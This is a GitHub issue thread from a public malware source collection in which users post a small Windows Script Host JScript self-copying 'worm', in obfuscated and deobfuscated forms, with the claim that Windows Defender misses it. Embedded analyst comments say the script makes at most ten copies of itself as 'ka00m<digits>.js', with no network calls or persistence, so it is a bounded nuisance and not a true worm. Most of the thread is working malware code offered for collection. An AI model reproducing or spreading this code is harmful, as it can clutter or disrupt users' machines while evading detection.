vxunderground / MalwareSourceCode

Collection of malware source code for a variety of platforms in an array of different programming languages.
https://vx-underground.org

JS worm that can duplicate itself #72

Closed theanonhackuk closed 1 year ago

theanonhackuk commented 1 year ago

Really cute worm I found somewhere on the internet that has only 10 lines of code and can actually make your computer collapse in some seconds/minutes. It's written in Windows JS code; it seems that Windows Defender doesn't detect it as malicious.

https://antiscan.me/scan/new/result?id=xoY5kGYacDYc

Obfuscated

This is the original; the file looked like this:

// Analysis note (static reading only; nothing here needs to be executed to triage it):
// - Layout is typical of string-array obfuscators: _0x24f1() returns a string table, the
//   leading IIFE rotates that table (push/shift) until a parseInt-based checksum equals
//   0xb64b5, and _0x27ee(i) then returns table[i - 0xef].
// - Strings readable directly in the table: 'ScriptFullName', 'FileExists', 'CopyFile',
//   'random', 'toString', 'ka00m', '.js'. 'Scripting.FileSystemObject' and 'replace' are
//   not hidden at all. The digit-prefixed entries appear to exist only to feed the checksum.
// - The trailing loop runs while a < 0xa (10 iterations) and, matching the deobfuscated
//   listing posted in this thread, copies the running script to a new "ka00m<digits>.js"
//   name when that name does not exist yet.
// - Requires Windows Script Host (ActiveXObject / WScript); it does not run in a browser
//   or in Node.js.
var _0x21b404=_0x27ee;(function(_0x263738,_0x19aac1){var _0x489d59=_0x27ee,_0x3747ec=_0x263738();while(!![]){try{var _0x1babdd=-parseInt(_0x489d59(0xfb))/0x1+parseInt(_0x489d59(0xfd))/0x2*(-parseInt(_0x489d59(0x102))/0x3)+-parseInt(_0x489d59(0xfc))/0x4*(parseInt(_0x489d59(0xfe))/0x5)+-parseInt(_0x489d59(0x101))/0x6*(-parseInt(_0x489d59(0x100))/0x7)+-parseInt(_0x489d59(0xf1))/0x8*(parseInt(_0x489d59(0xfa))/0x9)+parseInt(_0x489d59(0xf3))/0xa*(-parseInt(_0x489d59(0xf4))/0xb)+parseInt(_0x489d59(0xf6))/0xc*(parseInt(_0x489d59(0xf5))/0xd);if(_0x1babdd===_0x19aac1)break;else _0x3747ec['push'](_0x3747ec['shift']());}catch(_0x4f8d9a){_0x3747ec['push'](_0x3747ec['shift']());}}}(_0x24f1,0xb64b5));function _0x27ee(_0x5d8d9a,_0x27d6ef){var _0x24f114=_0x24f1();return _0x27ee=function(_0x27eef3,_0x17e0fe){_0x27eef3=_0x27eef3-0xef;var _0x430cfa=_0x24f114[_0x27eef3];return _0x430cfa;},_0x27ee(_0x5d8d9a,_0x27d6ef);}var awdnkfkwebjvlvdsjlehwrivfdsklmldkvsnkl=new ActiveXObject('Scripting.FileSystemObject'),fwewvbehfegfihgqwygckwvekcweghro7937rfiv=WScript[_0x21b404(0xf8)],a=0x0;function _0x24f1(){var _0x4a6c82=['44uwTaAy','365446hltTMr','397075lwjJMr','.js','35NdOfwW','1229730Aouzid','3CIsJDR','random','CopyFile','8FrUkTc','toString','3266230MVNAHW','22EwijlE','78GauFNK','5666844puiVNb','ka00m','ScriptFullName','FileExists','859482VhFsdV','1306488WyGrVl'];_0x24f1=function(){return _0x4a6c82;};return _0x24f1();}while(a<0xa){a=a+0x1;var dwanjkvlewlkjdbswlahd=_0x21b404(0xf7)+Math[_0x21b404(0xef)]()[_0x21b404(0xf2)]()['replace']('.','')+_0x21b404(0xff);!awdnkfkwebjvlvdsjlehwrivfdsklmldkvsnkl[_0x21b404(0xf9)](dwanjkvlewlkjdbswlahd)&&awdnkfkwebjvlvdsjlehwrivfdsklmldkvsnkl[_0x21b404(0xf0)](fwewvbehfegfihgqwygckwvekcweghro7937rfiv,dwanjkvlewlkjdbswlahd);}

Deobfuscated

The file is named kaoom.js.

// Analyst summary: Windows Script Host (JScript) script that copies its own file to up to
// 10 new names of the form "ka00m<digits>.js".
// Scope as shown: the loop is bounded (a < 10), and nothing in this listing executes the
// copies, registers persistence, or touches the network or another host. On this evidence
// it is a bounded self-copying script, not a self-propagating worm; the "collapse" effect
// described in the report is not reproduced by these lines alone.
// Triage hints: bursts of "ka00m*.js" files appearing next to a script run by
// wscript.exe/cscript.exe; the literal strings below are visible without deobfuscation.
var awdnkfkwebjvlvdsjlehwrivfdsklmldkvsnkl = new ActiveXObject("Scripting.FileSystemObject");  // COM FileSystemObject: used below for FileExists and CopyFile
var fwewvbehfegfihgqwygckwvekcweghro7937rfiv = WScript.ScriptFullName;  // full path of the currently running script (the copy source)
var a = 0;             // iteration counter
while (a < 10) {    // hard upper bound: at most 10 copy attempts per run
    a = a + 1;
    // Destination name: fixed prefix + the decimal digits of Math.random() with the first
    // "." removed + ".js". The name carries no directory part, so it is a relative path
    // (presumably resolved against the process's current directory — confirm on the host).
    var dwanjkvlewlkjdbswlahd = "ka00m" + Math.random().toString().replace(".", "") + ".js";
    // Copy only when the name is unused, so an existing file is never overwritten.
    if (!awdnkfkwebjvlvdsjlehwrivfdsklmldkvsnkl.FileExists(dwanjkvlewlkjdbswlahd )) {
        awdnkfkwebjvlvdsjlehwrivfdsklmldkvsnkl.CopyFile(fwewvbehfegfihgqwygckwvekcweghro7937rfiv, dwanjkvlewlkjdbswlahd );
    }
}

Result

image

Note

I don't think this is a very advanced script that someone would spread massively. I will just leave it here in case you want to add it to your repo.

DartPower commented 1 year ago
// Same logic as the deobfuscated sample, with descriptive variable names.
// Behaviour as shown: a Windows Script Host (JScript) script that copies its own file to
// up to 10 new "ka00m<digits>.js" names. Nothing here executes the copies, adds
// persistence, or reaches other hosts, so on this evidence it is a bounded self-copying
// script rather than a self-propagating worm.
var XFileSys = new ActiveXObject("Scripting.FileSystemObject");  // COM FileSystemObject: used below for FileExists and CopyFile
var XScriptName = WScript.ScriptFullName;  // full path of the currently running script (the copy source)
var a = 0;             // iteration counter
while (a < 10) {    // hard upper bound: at most 10 copy attempts per run
    a = a + 1;
    // Fixed prefix + digits of Math.random() with the first "." removed + ".js"; the name
    // has no directory part, so it is a relative path.
    var XFile = "ka00m" + Math.random().toString().replace(".", "") + ".js";
    // Skip names that already exist, so no existing file is overwritten.
    if (!XFileSys.FileExists(XFile )) {
        XFileSys.CopyFile(XScriptName, XFile );
    }
}

More readable deobfuscated file

vxunderground commented 1 year ago

+